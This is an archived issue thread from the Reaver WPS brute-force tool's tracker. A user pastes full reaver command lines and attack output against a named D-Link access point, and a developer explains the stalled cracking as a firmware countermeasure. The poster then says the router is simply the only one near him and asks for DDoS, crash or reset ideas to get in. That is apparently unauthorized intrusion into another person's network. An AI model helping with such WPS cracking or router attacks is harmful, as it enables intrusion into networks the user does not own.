h-eibot / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

first part of pin always correct #467

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
A few things to consider before submitting an issue:

0. We write documentation for a reason, if you have not read it and are
having problems with Reaver these pages are required reading before
submitting an issue:
http://code.google.com/p/reaver-wps/wiki/HintsAndTips
http://code.google.com/p/reaver-wps/wiki/README
http://code.google.com/p/reaver-wps/wiki/FAQ
http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers
1. Reaver will only work if your card is in monitor mode.  If you do not
know what monitor mode is then you should learn more about 802.11 hacking
in linux before using Reaver.
2. Using Reaver against access points you do not own or have permission to
attack is illegal.  If you cannot answer basic questions (i.e. model
number, distance away, etc) about the device you are attacking then do not
post your issue here.  We will not help you break the law.
3. Please look through issues that have already been posted and make sure
your question has not already been asked here: http://code.google.com/p
/reaver-wps/issues/list
4. Often times we need packet captures of mon0 while Reaver is running to
troubleshoot the issue (tcpdump -i mon0 -s0 -w broken_reaver.pcap).  Issue
reports with pcap files attached will receive more serious consideration.

Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.) last

1. What operating system are you using (Linux is the only supported OS)?
bt5r1
2. Is your wireless card in monitor mode (yes/no)?
on
3. What is the signal strength of the Access Point you are trying to crack?
high
4. What is the manufacturer and model # of the device you are trying to
crack?
dlink
5. What is the entire command line string you are supplying to reaver?
reaver -i mon0 -b MAC -vv -S
6. Please describe what you think the issue is.

the first part of pin is always correct
whet i start reaver it recives a M5 no matter what pin i am trying (1234 or 
4564 or any pin i put)!!! is this logical 
but when he try the second part of the pin it won't work

7. Paste the output from Reaver below.

Original issue reported on code.google.com by rahimr...@gmail.com on 31 Jan 2013 at 9:45

GoogleCodeExporter commented 8 years ago
no way!
Paste output & upload tcpdump

Original comment by kostad...@yahoo.com on 2 Feb 2013 at 1:43

GoogleCodeExporter commented 8 years ago
yes way

it is also known as 99.99% problem ..when reaver try all the pins and get 
stucked 
because the other users didn't try other pin and because the first pin reaver 
try it is 1234 ...you will find that all the users have got stucked in pin 
1234998

this is a small output 
i'll give you all that you want if you don't belive me

"in my guess i think that it is some kind of protection from dlink systems 
....it gives you M5 respond no matter what are the pin ..but when you submit 
the second half of the pin ...it compares the first+2nd part with the pin then 
give you the respond"

root@bt:~# reaver -i mon0 -b 1C:AF:F7:CD:A2:6F  -d 10 -x 3 -r 5:3 -N -S -L -vv 
--win7 -p 9999

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from 1C:AF:F7:CD:A2:6F
[+] Switching mon0 to channel 1
[+] Associated with 1C:AF:F7:CD:A2:6F (ESSID: ADM-BEN)
[+] Trying pin 99995676
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
^C
[+] Session saved.
root@bt:~# reaver -i mon0 -b 1C:AF:F7:CD:A2:6F  -d 10 -x 3 -r 5:3 -N -S -L -vv 
--win7 -p 4521

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from 1C:AF:F7:CD:A2:6F
[+] Switching mon0 to channel 1
[+] Associated with 1C:AF:F7:CD:A2:6F (ESSID: ADM-BEN)
[+] Trying pin 45215674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 45210006
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
^C
[+] Session saved.

Original comment by rahimr...@gmail.com on 3 Feb 2013 at 10:29

GoogleCodeExporter commented 8 years ago
Thah sould be the latest firmware crap from dlink.
I gues eaven when you try correct one will receive fake WSC NACK.
What model is this device?

Original comment by kostad...@yahoo.com on 5 Feb 2013 at 6:26

GoogleCodeExporter commented 8 years ago
i agree with you with the firmware
i am not sure what is the model i think 615 or dap 1360

is there anyother ideas  ?? ddos attack ? crash or reset the router any idea at 
all no matter how stupid it is so i can access to this AP 
please it is the only one near of me

Original comment by rahimr...@gmail.com on 5 Feb 2013 at 9:10

GoogleCodeExporter commented 8 years ago
i have same problem! with mtc touch 3.9G router

Original comment by christia...@gmail.com on 17 Jul 2013 at 11:19

GoogleCodeExporter commented 8 years ago
same issue with a LevelOne WBR-6012 router

Original comment by kasperka...@gmail.com on 17 Aug 2015 at 8:49